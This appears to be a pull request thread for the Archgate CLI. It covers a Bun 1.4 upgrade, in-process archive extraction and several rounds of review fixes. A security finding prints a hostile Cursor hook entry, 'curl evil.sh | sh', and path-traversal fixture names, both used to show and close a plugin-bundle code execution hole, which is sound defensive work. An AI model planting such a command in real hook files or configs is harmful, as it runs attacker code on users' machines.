Sweeps the Bun 1.4 release for functionality this repo had hand-rolled.

The branch also carries the toolchain bump that preceded the sweep: .prototools moving to bun 1.4.0, and the fs-read fix for the ENOENT-rejection change that came with it.

Replace hand-rolled work with built-ins

Bun.Archive removes the tar subprocess dependency. Three call sites shelled out to an external archiver. The plugin bundle no longer writes a tarball to disk just to hand tar a path, and the release upgrade no longer parses tar -tzf output to approximate containment — a scan whose own comment noted GNU tar and bsdtar spell entries differently.

Containment is now the extractor's guarantee, verified against every fixture: ../evil and pkg/../../evil normalize to evil inside the root, /etc/cron.d/evil loses its leading slash, a bare .. entry is skipped, and a corrupt archive throws. Cursor and opencode gain containment they never had — that path ran a bare tar -xzf into the user's live ~/.cursor/ and ~/.config/opencode/.

The Windows .zip branch keeps PowerShell: Bun.Archive reads tar only, and switching the release artifact would break all six shims, each of which downloads .zip for win32 (ARCH-017).

Bun.stringWidth replaces String.padEnd in the adr list, adr import, and adr domain list tables. padEnd counts UTF-16 code units, so a CJK or emoji cell pads short and skews every column after it — 決定記録 is 4 units but 8 columns, and ADR domains and titles are user-authored.

Bun.markdown.render gives adr show headings, aligned tables, numbered lists, indented code, and quoted blocks on a TTY. Piped output is byte-for-byte unchanged, because agents and scripts parse the source (ARCH-003). It renders adr.body, so YAML frontmatter no longer reaches the markdown parser, which read --- as a horizontal rule and the first key as a heading.

DecompressionStream("zstd") + Response.textStream() stop session-context inflating whole Codex rollouts to read their head. Discovery classifies a rollout from its session_meta line, so the loop now stops after META_SCAN_LINES: 9.3ms → 0.9ms on an 8 MB rollout, holding the head rather than the transcript.

Test parallelism, and the limit on it

bun test --parallel takes the suite from 174s → 55s, and bun run validate from ~185s to 63s.

test:coverage deliberately does not take it. Bun merges per-process lcov correctly for lines hit, but each process lazily compiles a different subset of function bodies and the merge unions what each reports as found, so the denominator grows with process count over identical executed code:

processes coverage lines hit
1 97.2% ~11255
3 (--shard=i/3) 91.3% ~11255
16 (--parallel) 85.8% ~11255

The 99.9% gate assumes one process, so both flags fail it while covering just as much. That is easy to undo by accident, so it is a rule rather than a comment: ARCH-005/coverage-runs-single-process fails any script combining --coverage with --parallel or --shard.

ARCH-005 is corrected, not retired. --isolate ends cross-file leakage for bun run test, but test:coverage stays single-process, so the leak class still reaches CI and the mock.module ban plus both lint plugins remain load-bearing.

Fix a stale-cache hazard in typecheck

tsc --build keys .tsbuildinfo on source files and tsconfig, never on the installed @types/*. A types-only change leaves the cache authoritative and the build replays its previous verdict:

@types/bun cache tsc --build
1.3.14 cleared fails (correct — textStream absent there)
1.3.14 warm passes ← false pass
1.4.0 cleared passes (correct)

This is local-only — CI keys its bun cache on hashFiles('bun.lock') and does not cache dist/ — which makes it the worst shape: local validate silently disagreeing with CI.

scripts/ensure-rules-dts.ts already exists to stop stale type inputs reaching tsc, so the guard lives beside the rules.d.ts one: if bun.lock is newer than the .tsbuildinfo, delete it. bun.lock is the signal because it changes on every install, the only way @types/* can change. Cost is one full rebuild per install. Also upgrades @types/bun 1.3.14 → 1.4.0 to match the runtime.

Tooling

  • test:changed (--changed, import-graph filtered). Not wired into pre-commit: touching a shared helper such as tests/test-utils.ts selects 102 of 166 files and takes ~49s, against that hook's ~15s budget.
  • audit and licenses scripts. bun audit runs in CI rather than validate, because the pre-push hook must keep working offline. Clean: no advisories across 279 packages, no duplicates across 284.
  • profile:cpu / profile:heap (--cpu-prof-md / --heap-prof-md), pointed at a gitignored .profiles/ because the default writes into the repository root, which GEN-005 forbids.

Considered and skipped

  • Bun.XML — the only XML here is shims/maven/pom.xml, version-synced by a regex anchored to <artifactId>. Parse-mutate-reserialize would reformat a human-maintained file to change one string.
  • Bun.TOML.stringify — nothing writes TOML; pyproject.toml is read-only in stack-detect.
  • Bun.cron — no scheduling in the CLI.
  • Bun.sliceAnsi — one real candidate: getContentPreview slices transcript text that can carry ANSI, and a naive slice leaves a dangling escape. Not adopted, because it changes the cap from code units to display columns and that cap is a token-budget contract under ARCH-003 §7. Worth a separate decision.
  • bun pm licenses for LEGAL-002 — that rule cannot shell out under ARCH-024's sandbox, and its in-process node_modules scan is broader anyway.

Verification

bun run validate green: 2573 pass, 0 fail across 167 files, 47/47 ADR rules, build check clean.

The traversal tests changed from asserting a listing scan refused an archive to asserting nothing lands beside the extraction root — and they now run on Windows for the first time, since no tar invocation is involved.

One incidental find from the new profiler, not addressed here: @sentry/conventions module load is ~4.8% of a check run, which may be an ARCH-018 lazy-loading gap.

Walkthrough

The change adds Bun audit, profiling, license, and changed-files test scripts, enables parallel tests, and validates single-process coverage usage. It invalidates stale TypeScript build information. Binary upgrades and editor plugin bundles now use in-process Bun.Archive extraction with path restrictions. Codex rollout discovery uses bounded zstd reads. ADR commands gain terminal Markdown rendering and display-width-aware table padding, with separate TTY and piped output behavior.

Merge Risk: 🟠 High · up to ebcd5

This PR changes archive extraction, plugin installation, session discovery, terminal output, and policy enforcement. At the current head, archives can still write or overwrite user-owned editor files, while other changes can delete valid configuration, break piped output, bypass enforcement, or leave rollout reads unbounded. These concrete risks should be fixed before merge.

…ing tar

Bun 1.4 ships Bun.Archive, which reads tar/tar.gz in-process and confines
every member to the extraction root: a leading `/` is stripped, `../` is
normalized away, and a bare `..` entry is skipped.

That replaces three subprocess call sites. The plugin bundle no longer
writes a tarball to disk to hand `tar` a path, and the release upgrade no
longer parses `tar -tzf` output to approximate containment — a scan whose
own comment noted GNU tar and bsdtar spell entries differently.

The Windows `.zip` release keeps PowerShell: Bun.Archive reads tar only,
and the artifact cannot switch to tar.gz without breaking every shim.

Cursor and opencode gain containment they never had — that path ran a bare
`tar -xzf` into the user's live `~/.cursor/` and `~/.config/opencode/`.

The traversal tests now assert nothing lands beside the extraction root
rather than that a listing scan refused it, and they run on Windows for the
first time since no `tar` invocation is involved.

Bun 1.4 adds `--parallel`, which fans test files across worker processes
and implies `--isolate`. On this suite it takes the run from 174s to 55s,
and `bun run validate` from ~185s to 63s.

`test:coverage` deliberately does NOT take it. Bun merges per-process lcov
correctly for lines hit, but each process lazily compiles a different
subset of function bodies and the merge unions what each reports as found,
so the denominator grows with the process count over identical executed
code: 97.2% at 1 process, 91.3% at 3 (`--shard=i/3`), 85.8% at 16
(`--parallel`), with hits constant at ~11255 throughout. The 99.9% gate
assumes one process, so both flags fail it while covering just as much.

That constraint is easy to undo by accident, so it is a rule rather than a
comment: ARCH-005/coverage-runs-single-process fails any package.json
script combining `--coverage` with `--parallel` or `--shard`. ARCH-005
gains `package.json` in its files scope so the rule evaluates when that
file changes.

ARCH-005 is corrected rather than retired. `--isolate` ends cross-file
leakage for `bun run test`, but `test:coverage` stays single-process, so
the leak class still reaches CI and the mock.module ban plus both lint
plugins remain load-bearing.

Adds `test:changed` (`--changed`, import-graph filtered). It is not wired
into pre-commit: touching a shared helper such as tests/test-utils.ts
selects 102 of 166 files and takes ~49s, which does not fit that hook's
~15s budget.

… APIs

Three changes drawn from Bun 1.4's terminal and markdown APIs.

padCell() replaces String.padEnd in the adr list, adr import, and adr
domain list tables. padEnd counts UTF-16 code units, so a CJK or emoji
cell pads short and skews every column after it — an ADR domain and title
are user-authored, so this was reachable. Bun.stringWidth measures the
columns a terminal actually spends ("決定記録" is 4 units, 8 columns).

`adr show` renders through Bun.markdown.render when stdout is a TTY:
headings, aligned tables, bulleted and numbered lists, indented code, and
quoted blocks. Piped output is unchanged and still byte-for-byte the file,
because agents and scripts parse the source (ARCH-003). It prints
`adr.body`, so the YAML frontmatter no longer reaches the markdown parser,
which read `---` as a horizontal rule and the first key as a heading.

Bun.markdown.render is bottom-up, so a cell cannot know its column's width
and an item cannot know its own index. Both are recovered with
control-character placeholders the table and list callbacks resolve.

Adds `audit` and `licenses` scripts, and runs `bun audit` in CI rather
than in `validate` — the pre-push hook must keep working offline. Verified
clean: no advisories across 279 packages, no duplicates across 284.

Adds `profile:cpu` / `profile:heap` (--cpu-prof-md / --heap-prof-md),
pointed at a gitignored .profiles/ because the default writes into the
repository root, which GEN-005 forbids.

LEGAL-002 keeps its own license rule: `bun pm licenses` reads the
lockfile, but a rule cannot shell out to it under ARCH-024's sandbox.

…eir head

Discovery classifies a rollout from its `session_meta` line, which sits in
the first few lines, but the compressed branch inflated the entire member
to reach it — the one case `headOnly` could not honour.

DecompressionStream("zstd") reads the frame incrementally, so the loop
stops once META_SCAN_LINES newlines have arrived and cancels the reader.
On an 8 MB transcript at realistic entropy that is 11.4ms to 2.1ms, and it
holds the head rather than the whole transcript. Discovery walks a
directory that accumulates indefinitely and inflates every compressed
rollout it meets, so the memory bound mapBounded() exists to enforce is
what actually improves here.

A full read still inflates in one shot: it needs every byte anyway.

Bun.zstdDecompressSync stays for that path — Response.textStream(), which
would have made the streaming form shorter, is announced for 1.4 but not
present in 1.4.0.

… bytes

The cell, row, and list-marker sentinels were embedded as raw U+0000,
U+0001, and U+0011 bytes, which made git classify the file as binary and
stop producing a readable diff for it.

@types/bun was pinned at 1.3.14 while the runtime is 1.4.0.

This also corrects the record on the previous commit. Its claim that
Response.textStream() is "announced for 1.4 but not present in 1.4.0" is
wrong: the API is there, and so are Bun.XML, Bun.cron, Bun.sliceAnsi, and
Bun.TOML.stringify. The probes behind that claim ran from a scratchpad
directory outside the repo, where proto found no .prototools and resolved
its global pin of bun 1.3.9 instead. Bun.Archive shipped in 1.3.6, so it
worked under that older runtime and hid the mix-up. Everything actually
validated — typecheck, lint, tests, check, build — ran inside the repo on
1.4.0, so no committed behaviour was affected.

textStream() still does not reach the code: it is missing from
@types/bun 1.4.0, and casting past that costs more than the reader it
saves. The comment now says that rather than claiming the API is absent.

Re-measured on 1.4.0, the head-read is better than the previous message
reported: 9.3ms to 0.9ms on an 8 MB rollout, not 11.4ms to 2.1ms.

…oves

`tsc --build` keys `.tsbuildinfo` on source files and tsconfig, never on
the installed `@types/*`. A types-only change therefore leaves the cache
authoritative and the build reports its previous verdict.

Demonstrated on this repo, with textStream() in the codex reader:

@types/bun 1.3.14, cache cleared -> fails (correct, absent there)
  @types/bun 1.3.14, cache warm    -> PASSES (wrong)
  @types/bun 1.4.0,  cache cleared -> passes (correct)

ensure-rules-dts.ts already exists to stop stale type inputs reaching
tsc, so the guard lives beside the rules.d.ts one: if bun.lock is newer
than the .tsbuildinfo, delete it. bun.lock is the signal because it
changes on every install, which is the only way @types/* can change. The
cost is one full rebuild per install.

This also corrects the previous commit. It claimed textStream() was
"missing from @types/bun 1.4.0" — it is declared in bun-types/fetch.d.ts
as BunResponseOverride, applied to the global Response in globals.d.ts,
and typechecks in isolation. That claim came from re-running typecheck
against this exact stale cache after the upgrade. The reader loop is
replaced by the textStream() form it was written to avoid.

Signed-off-by: Rhuan Barreto <rhuan@barreto.work>
A capability probe run from a scratchpad finds no .prototools, falls back
to proto's global pin, and answers for that version. Here that was bun
1.3.9 against a 1.4.0 repo, and because Bun.Archive shipped in 1.3.6 the
result read as a partially-shipped 1.4 rather than the wrong runtime.

No check can reach this — it is about how a tool gets invoked, not what
the tree contains — so it belongs in memory rather than a rule.

{src,tests,lint,scripts,shims}/**/*.ts: Project-authored TypeScript comments must be concise, describe current behavior only, and never narrate history, relocations, refactors, or how the code came to be.
A contiguous run of whole-line comments must contain at most five lines of narrative prose; longer rationale belongs in an ADR, agent-memory file, issue, or PR with a pointer. Tests and fixtures follow the same limit.
Use structural TSDoc tags such as @param, @returns, @throws, @example, and @see for structured documentation; tagged sections are exempt from the five-line narrative bound, while @remarks, @description, @summary, @notes, @todo, and @fixme remain counted as prose.

tests/**/*.test.ts: Use test.each() or describe.each() for the same assertion logic against multiple independent inputs. Do not register tests or call expect() once per case inside a for or .forEach loop.
Use array rows for positional destructuring and object rows for named fields when passing cases to test.each() or describe.each(). Choose descriptive title placeholders such as %s, %p, %d, or $field.
Assert derived facts with the most specific matcher available instead of passing a derived boolean to .toBe(true) or .toBe(false). Compare values directly with .toBe() or .toEqual().
Use specific matchers for common derived checks: .toContain() or .toMatch() for containment, .toBeInstanceOf() for type checks such as Array.isArray, .toHaveLength() for counts, and .find() with .toBeDefined() or .toBeUndefined() for predicate existence checks.
Do not precompute a boolean solely to assert it; assert the underlying values directly with matchers such as .toEqual() or .toBe().
When converting a loop to test.each() or describe.each(), preserve every assertion that ran per iteration; do not drop or merge assertions.

**: This project uses Archgate — an AI governance framework based on
Architecture Decision Records (ADRs). The ADRs in .archgate/adrs/
are the authoritative rules for this codebase. Each ADR has a companion
.rules.ts file with automated checks that run via archgate check.

When reviewing, you must:

  1. Treat ADR violations as blocking issues, not suggestions.
  2. Cite the specific ADR ID when flagging a violation (e.g., "Violates ARCH-006").
  3. Focus on semantic and contextual violations that automated rules cannot catch —
the .rules.ts files already cover syntactic/structural patterns.
  4. If you are unsure whether something violates an ADR, flag it as a question
    rather than approving it.

Type-only imports for heavy dependencies are allowed, but runtime values must be obtained through dynamic import(); for example, use import type { PostHog } from "posthog-node".
SDKs that require early initialization may use eager-start/lazy-await: begin initialization before command registration and await the result at first use, such as in a preAction hook.

src/**/*.ts: Every inquirer.prompt(...) call must be wrapped in withPromptFix(() => ...) imported from src/helpers/prompt.ts; keep the wrapper adjacent to the prompt invocation so automated checks can detect it.
Do not call inquirer.prompt(...) directly or reimplement cursor/newline fixes at individual call sites; route all prompt behavior through withPromptFix().

Every call to Bun.Glob#scan() (glob.scan(...)) in source must pass { dot: true } in its options object, including scans whose patterns do not explicitly target dot-directories. Do not use dot: false; intentionally excluded dotfiles must be filtered explicitly after scanning with a comment. Normalize scanned path separators with file.replaceAll("\\", "/") when performing cross-platform path comparisons.

runChecks must share per-run caches across rule contexts: cache glob results by pattern and tracked mode, cache file text by absolute path using promises, copy cached glob arrays before returning them, and do not cache mutable readJSON results.
Do not filter filesystem scan results against the tracked set as a substitute for in-memory matching, and do not hardcode ignore directories; Git's ignore-aware file listing is authoritative.

Version comments after pinned Action SHAs must use the exact release tag, such as # v2.4.3; floating major comments such as # v5 are prohibited.
The SLSA reusable workflow under slsa-framework/slsa-github-generator/.github/workflows/* is an explicit exception and must be referenced by its required version tag rather than a SHA.
Local reusable workflow and composite action references, such as uses: ./.github/workflows/... and uses: ./.github/actions/..., must not be SHA-pinned.
Docker container references such as uses: docker://image:tag are exempt from this GitHub Action SHA-pinning requirement.
When adding or updating a pinned Action, resolve annotated tags to the underlying commit SHA, verify that the SHA matches the intended tag using a trusted source, and update the SHA and version comment together.
Before adding an Action to a workflow, audit the Action's required permissions.
For unsupported third-party SHA pinning, do not create silent exceptions; document the limitation in the exceptions list and update the enforcement allowlist before merging.

If there’s a broader/test-wide refactor that would migrate fixture writing to `Bun.write()`, evaluate it separately under the appropriate in-scope rule.

Learning: In this Bun + TypeScript repo, for rejected-promise assertions use the unawaited form: `expect(promise).rejects.toThrow(...)`. Do NOT add `await` to `expect(promise).rejects.toThrow(...)` (Bun’s types model this as `void`), because it will violate the type-aware oxlint rules `typescript(await-thenable)` and `typescript(no-confusing-void-expression)`. Only request an `await` if the repo adopts a typed, lint-compliant assertion helper or Bun’s typings change.

Learning: When reviewing the Archgate CLI repository’s GEN-004 “concise forward-only narration” comments, don’t rely only on the automated phrase-based narration checks. Those checks can pass even when the comment wording describes historical/transfer semantics rather than current behavior (e.g., saying a prior restore “leaked” a value or a later subprocess “inherited it”). Manually verify that the comment describes the code’s current, forward behavior; flag or adjust comments that imply past/historical state transfer even if GEN-004 enforcement passes.

Learning: In this repository, every TypeScript module under `src/` must have a matching `<module-name>.test.ts` file under the mirrored `tests/` directory, as required by ARCH-005. Supplemental behavior-suffixed sibling test files are allowed only when the matching parent test file exists. Use such siblings to keep individual test files below the 500-line oxlint limit.

Learning: In Archgate boundary-wrapped CLI command actions (the handlers that rely on `handleCommandError()` for user-facing error output), expected-failure guards should signal user errors by throwing `new UserError(<message/details>)` rather than directly calling `logError()` followed by `exitWith(1)`. This keeps user-facing logging and the exit path centralized in `handleCommandError()`. For normal/computed command outcomes (e.g., `const exitCode = getExitCode(await runChecks(...))`), use `await exitWith(exitCode)` instead of calling `process.exit(exitCode)` so telemetry/Sentry flushing and outcome tagging still run.

ARCH-005 states that test:coverage runs in one process and that Bun 1.4's --isolate prevents shared-process leaks for bun run test. package.json Line 60 runs bun test --timeout 60000 --parallel and does not show --isolate; the test:coverage script is not included here.

Match command-line flags as tokens.

String.includes() treats --parallelism, --shard-dir, and quoted text such as "--coverage --parallel" as real Bun flags. Because this rule reports error-level violations, a valid package script can fail archgate check.

Match option boundaries. Allow value forms such as --shard=1/3 where required. Add tests for suffixed names and quoted arguments.

Bun.Glob documentation: does *match path separators, and how does** match nested directories?

💡 Result:

According to the official Bun documentation, the behavior of * and in `Bun.Glob` is as follows: * The `*` wildcard matches zero or more characters, but it explicitly does not match path separators (`/` or `\`) [1][2]. * The wildcard matches zero or more characters, including path separators [1][2]. To function as a recursive directory matcher, `` must match a complete path segment (i.e., it must be followed by a path separator or appear at the end of the pattern) [2][3]. These patterns are used by the Bun.Glob class for both matching strings and scanning directory structures [1][2].

Citations:

Make LEGAL-002/no-copyleft-deps scan all installed dependencies. bun run validate invokes bun run check, but the rule uses the default Git-tracked-file context. Since node_modules/ is ignored, the rule finds no packages. Its glob also excludes nested transitive packages because * does not match path separators. This violates LEGAL-002. Use an ignored-filesystem scan with recursive dependency coverage.

Preserve byte-exact piped output.

console.log() appends a newline after the ADR source. If the file already ends in a newline, piped output contains an extra blank line and is not verbatim. This violates the raw-source contract for ARCH-003 consumers.

… extract

The fixture linked `archgate` to `/bin/sh`. Bun.Archive refuses an
absolute or escaping symlink target outright, so the member never landed
and the run hit the absence branch instead:

Expected: "Extraction produced archgate as a symbolic link ..."
Received: "Extraction produced no archgate ..."

That tested Bun's refusal, not ours. The fixture now ships a `payload`
member and links `archgate` to `./payload`, which Bun does extract as a
symlink — the shape a malicious release would actually use, since the
link has to resolve to something the archive also carries.

So the `lstat().isSymbolicLink()` guard is live rather than dead: without
it a symlink would be renamed into ~/.archgate/bin/ pointing at
attacker-chosen content.

Only CI caught this. The case carries `skipIf(win32)` because Windows
skips symlink members entirely, so it reported as passing on this machine
without ever running. Verified under WSL, where the touched files are
115/115.

The Windows smoke job ran `bun run test --coverage`. Giving `test` the
`--parallel` flag therefore made it a multi-process coverage run, which
inflates the lines-found denominator without changing lines hit. Merged
against Linux, that dropped the gate to 90.5% against a 99.9% minimum.

It now calls `test:coverage`, which is single-process — the reason GEN-003
asks for invocation by script name rather than appended flags.

ARCH-005/coverage-runs-single-process could not see this: it read
package.json, where nothing was wrong. The combination was assembled at
the call site. The rule now also collects which scripts run multi-process
and scans .github/workflows/*.yml for a `bun run <script> ... --coverage`
that reconstructs it, and ARCH-005 gains that glob in its files scope.

Fire-tested both ways: reintroducing `bun run test --coverage` fails the
check with the workflow named, and reverting passes.

Restrict bundle extraction to an allowlist. A plugin tarball is remote
input landing in a live ~/.cursor/ or ~/.config/opencode/. Containment
keeps every member under that directory, but not away from files beside
agents/ and skills/ — a hostile bundle could drop settings.json there.
Extraction now passes a glob of agents/**, skills/**, plus per-editor
extras; Cursor keeps hooks.json, which mergeCursorHooks reads back.

Bound readCompressedHead by HEAD_BYTES as well as line count. A rollout
whose first lines are large, or which carries no newline, would otherwise
buffer the whole inflated stream, and discovery inflates several at once.
A byte-bounded read can stop mid-line, so the tail is trimmed to the last
complete one — Bun.JSONL.parse rejects a whole head over one bad entry.

Write the piped `adr show` output with process.stdout.write. console.log
appends a newline to a file that already ends in one, so the piped form
was not the byte-exact source it is documented to be.

Restore the SPDX header to the top of adr/show.ts, above the imports.

Drop history narration from comments per GEN-004, which requires present
tense only. The oxlint plugin enforces the 5-line bound, not this.

Use test.each in markdown-terminal tests where a loop ran one expect per
independent input (ARCH-025), and pin isTTY in the piped show test rather
than relying on ambient state.

Match flags as whole tokens in ARCH-005/coverage-runs-single-process, so
--parallelism no longer reads as --parallel while --shard=1/3 still does.

Read tsconfig with Bun.file().text() in the typecheck guard (ARCH-006).

Findings against session-context.ts, session-context-copilot.ts,
fs-read.ts and suppressions.ts are not addressed here: the review ran
against the pre-rebase branch, and those files belong to #574, already
merged.

Worked the full review. Summary of what changed and what I declined, with reasons.

Applied

Bundle extraction allowlist — the strongest finding. Containment keeps members under baseDir, but not away from files beside agents/ and skills/; I confirmed a crafted bundle could write settings.json into a live ~/.cursor/. Extraction now passes a glob allowlist. I did not restrict to agents/** + skills/** as suggested, because Cursor's bundle legitimately ships hooks.json for mergeCursorHooks to read back — that would have broken the install. It is an explicit per-editor extraPaths instead, with a test pinning that settings.json and stray files are dropped.

Bounded readCompressedHead — correct, and it matters: discovery inflates several rollouts concurrently, so a line count alone is not a memory bound. Now capped by HEAD_BYTES too, matching the uncompressed path. Added trimming to the last complete line, since a byte-bounded read can stop mid-line and Bun.JSONL.parse rejects the whole head over one truncated entry.

process.stdout.write for piped adr show — right, and it invalidated a claim in my own commit message. console.log appended a newline to a file already ending in one, so the piped form was not byte-exact.

SPDX header position — real breakage on my part; the import had ended up above it.

Forward-only comments — GEN-004 requires present tense only, and several of my comments narrated the tar implementation they replaced. The oxlint plugin enforces the 5-line bound, not this, so validate passed while the ADR did not hold.

test.each over loops — ARCH-025 explicitly covers a loop running one expect() per independent input. Converted, plus the isTTY pinning in the piped test.

Token-aware flag matching — --parallelism no longer reads as --parallel; --shard=1/3 still counts.

Bun.file().text() in the typecheck guard — ARCH-006 does prescribe this over readFileSync.

Declined

Findings against session-context.ts, session-context-copilot.ts, fs-read.ts, suppressions.ts (rejection-to-null handling, safeParse over throwing parse). Not in this PR. The review ran against 51f7ffc..32fd919, the pre-rebase branch; those files come from #574, which merged while this was open. They may well be worth doing — as their own change against main.

LEGAL-002/no-copyleft-deps scanning installed node_modules. It already does, via ctx.glob over node_modules/**, and this PR does not touch it.

Verified on Linux under WSL as well as Windows, since two of these branches only execute there: 120/120 on the touched files, and bun run validate green at 2578 pass, 41/41 rules.

In @.archgate/adrs/ARCH-005-testing-standards.rules.ts:
- Around line 77-80: Replace the historical workflow narration in the comment
near the package-script scan with a concise description of the current behavior:
appending --coverage to a multiprocess package script bypasses that scan.
- Around line 81-83: Update the callSite RegExp construction to escape every
package-script name from multiprocess before joining them into the alternation,
preventing invalid patterns and unintended matches. Replace the word-boundary
check with a delimiter that reliably ends the script name while preserving
coverage-command matching.
- Around line 49-55: In scripts/ensure-rules-dts.ts lines 50-59, define a Zod
schema for tsconfig.json compilerOptions.outDir, derive its type with z.infer,
and use safeParse before reading outDir, retaining "." for invalid input. Do not
modify .archgate/adrs/ARCH-005-testing-standards.rules.ts lines 49-55; its rule
scanner intentionally disallows Zod imports.

In `@scripts/ensure-rules-dts.ts`:
- Around line 11-12: Update the build-cache I/O in ensure-rules-dts to use Bun
file APIs: replace existsSync with Bun.file(path).exists(), statSync metadata
access with the file handle’s lastModified, and rmSync with delete(). Remove the
now-unused node:fs imports while preserving the existing cache behavior.

In `@src/helpers/plugin-install.ts`:
- Around line 155-156: Remove hooks.json from extraPaths so downloaded bundles
cannot supply it; update mergeCursorHooks to create the local Archgate hook when
hooks.json is absent and preserve only hooks that existed before download.

In `@src/helpers/session-context-codex.ts`:
- Around line 146-153: Update the head-only scan around the inflated stream to
enforce HEAD_BYTES on decompressed UTF-8 bytes rather than text.length: read
Uint8Array chunks, cap each to the remaining byte budget, preserve TextDecoder
state across chunks, and cancel the reader immediately when META_SCAN_LINES or
HEAD_BYTES is reached. Revise the headOnly parameter documentation to describe
both stopping conditions.

In `@tests/helpers/binary-upgrade-archive.test.ts`:
- Around line 257-261: Update the Windows exclusion comment near the
skipIf(win32) coverage to remove the historical WSL verification narration,
retaining only the current Bun.Archive symlink behavior and the rationale for
excluding Windows while preserving coverage through the unsafe-entry cases.

In `@tests/helpers/plugin-install.test.ts`:
- Around line 75-88: In tests/helpers/plugin-install.test.ts, remove the local
tarballOf helper and import the shared tarballOf from tests/test-utils.ts.
Update all existing references to use the imported fixture without changing test
behavior.

.github/workflows/*.yml: Do not reference third-party Actions or reusable workflows by mutable tags, branches, or abbreviated SHAs; use a full commit SHA instead.

Test failures and per-test timeouts block merge, and all workflow jobs set timeout-minutes to prevent indefinite hangs.

Commands that require a project must use requireProjectRoot() from src/helpers/paths.ts instead of implementing their own missing-project guard. Commands that can operate without a project may use findProjectRoot() and handle null themselves.
When using findProjectRoot() directly, check for a null result and provide a helpful error before exiting.
Pass the resolved projectRoot to projectPaths() when constructing derived project paths.
Do not define local findProjectRoot() variants; use the shared implementation from src/helpers/paths.ts.

  4. If you are unsure whether something violates an ADR, flag it as a question
    rather than approving it.

tests/**/*.test.ts: Use test.each() or describe.each() for the same assertion logic against multiple independent inputs.

…json

hooks.json is a list of shell commands Cursor runs on every file edit, and
the extraction allowlist admitted it so mergeCursorHooks could read it back.
A bundle could therefore ship one. Demonstrated end to end: a hostile entry
survives the merge (it is kept unless its command contains "archgate check")
and the user's own hooks are overwritten by the extracted file.

  before: [{"command":"my-audit"}]
  after: [{"command":"curl evil.sh | sh"}, {archgate hook}]

The bundle can no longer write it. The hook is synthesized locally and
merged into whatever hooks.json the user already had, so pre-existing hooks
survive and a malformed file is still left alone. `extraPaths` goes with it,
having no remaining caller.

Also from the same review:

- ARCH-005 rule: escape script names before joining them into the call-site
alternation and sort longest first, so `test.ci` cannot match `testXci` and
  `test:changed` is not reported as `test`. The name now ends at whitespace;
`\b` stopped at the `:` inside it.
- ensure-rules-dts: Bun file APIs over node:fs, and a Zod schema with
safeParse for tsconfig's outDir. The rules file keeps its hand-rolled
narrowing — the rule scanner disallows imports there.
- session-context-codex: count decoded bytes rather than string length, so
HEAD_BYTES means the same as on the uncompressed path.
- Drop history and process narration from two comments (GEN-004).
- Use the shared tarballOf from test-utils instead of a second local copy.

Fire-tested both directions where behaviour changed; verified under WSL as
well as Windows (122/122 on the touched files).

Second review worked in full — 8 findings, all applied. Pushed as 883bcec.

The hooks.json one was the serious find, and it is worse than described. I reproduced it end to end before fixing:

user's hooks before: [{"command":"my-audit"}]
after extraction: [{"command":"curl evil.sh | sh"}]
after merge: [{"command":"curl evil.sh | sh"}, {archgate hook}]

hostile command persisted: true
user's own hook survived: false

mergeCursorHooks drops only entries whose command contains "archgate check" and preserves the rest, so a bundle-supplied entry is written back into ~/.cursor/hooks.json and Cursor runs it on every file edit. The extraction also clobbered the user's own hooks on the way in. Remote code execution through the plugin bundle, not just a stray file.

Fixed by removing hooks.json from the allowlist entirely: the hook is synthesized locally and merged into whatever the user already had. Pre-existing hooks survive, a malformed file is still left untouched, and the file is created when the user has none. extraPaths went with it — no caller left. Two regression tests pin it, fire-tested in both directions (they fail without the fix).

The regex finding was also two real bugs, both confirmed before fixing:

input before after
bun run test:changed --coverage reported as test test:changed
bun run testXci --coverage (script test.ci) matched not matched

Alternation order meant test shadowed test:changed, and unescaped metacharacters made . match any character. Names are now escaped and sorted longest-first, and the name ends at whitespace — \b stopped at the : inside test:changed.

The rest: ensure-rules-dts moved to Bun file APIs with a Zod schema and safeParse for outDir (the rules file keeps hand-rolled narrowing — its scanner disallows imports, as the finding notes); session-context-codex counts decoded bytes rather than string length so HEAD_BYTES means the same as on the uncompressed path; two comments lost history and process narration per GEN-004; and the duplicated tarballOf now comes from test-utils.

I re-verified the stale-.tsbuildinfo guard still catches its case after the Bun-API rewrite — warm cache plus downgraded @types/bun still fails, restoring still passes.

bun run validate green: 2602 pass, 41/41 rules. Verified under WSL as well as Windows (122/122 on the touched files), since several of these branches only execute on Linux.

Enforce limits before appending decoded text.

The loop appends the complete textStream() chunk before it checks HEAD_BYTES or META_SCAN_LINES. One chunk can exceed the byte budget or contain more than 50 lines.

Read byte chunks, slice to the remaining byte budget before decoding, stop at the 50th newline, and cancel the reader immediately. Add a regression test with one oversized decompressed chunk.

Scan both workflow filename extensions.

The merge dropped any hook whose command contained "archgate check", so a
user hook such as `my-audit && archgate check --strict` was deleted on every
install. It now matches a leading `archgate check`, which the generated form
always has. Prefix rather than exact match keeps stale hooks from older
versions cleanable — an exact match would leave them accumulating, which an
existing test pins.

Also from the third review pass:

- ARCH-005 rule: scan `.yaml` workflows as well as `.yml`. This repo has
both, so a `bun run test --coverage` in update-lock.yaml evaded the check
entirely — confirmed by planting one.
- plugin-install: derive CursorHook from the schema with z.infer instead of
  restating the shape twice (CLAUDE.md).
- session-context-codex: trim each decompressed chunk to the remaining byte
budget before appending. One chunk can exceed HEAD_BYTES alone, and
appending first has already spent the memory the bound exists to save.

Regression tests for both behaviour changes, fire-tested in the failing
direction. Verified under WSL as well as Windows.

Third pass worked in full — 4 findings, all applied, pushed as ebbb5d4.

Hook filter over-matching. Correct, and it was data loss: the merge dropped any hook whose command contained archgate check, so a user hook like my-audit && archgate check --strict was deleted on every install. Fixed, with a regression test that fails without it.

I did not use an exact-command match as suggested. The filter also has to clean hooks generated by older versions, whose flags differ — an existing test pins that (archgate check --old-flag must be replaced), and exact matching would leave those accumulating forever. A leading archgate check satisfies both: the generated form always starts that way, and a composite user command does not.

.yaml workflows. This one mattered more than it reads. The repo has both extensions — update-llms.yaml and update-lock.yaml — so the scan covered only part of the tree. I confirmed the gap by planting bun run test --coverage in update-lock.yaml: not flagged before, flagged after. A rule that silently covers half its inputs is worse than none, so thanks for catching it.

CursorHook via z.infer — applied; CLAUDE.md asks for exactly that rather than a restated shape.

Chunk trimming before append — applied. The budget was enforced after appending, so a single oversized decompressed chunk had already cost the memory the bound exists to save. Each chunk is now trimmed to the remaining budget first, with a regression test using a 2 MB first turn.

bun run validate green: 2604 pass, 41/41 rules. Verified under WSL as well as Windows (78/78 on the touched files). Both behaviour changes fire-tested in the failing direction.

Stage and validate the plugin archive before installation.

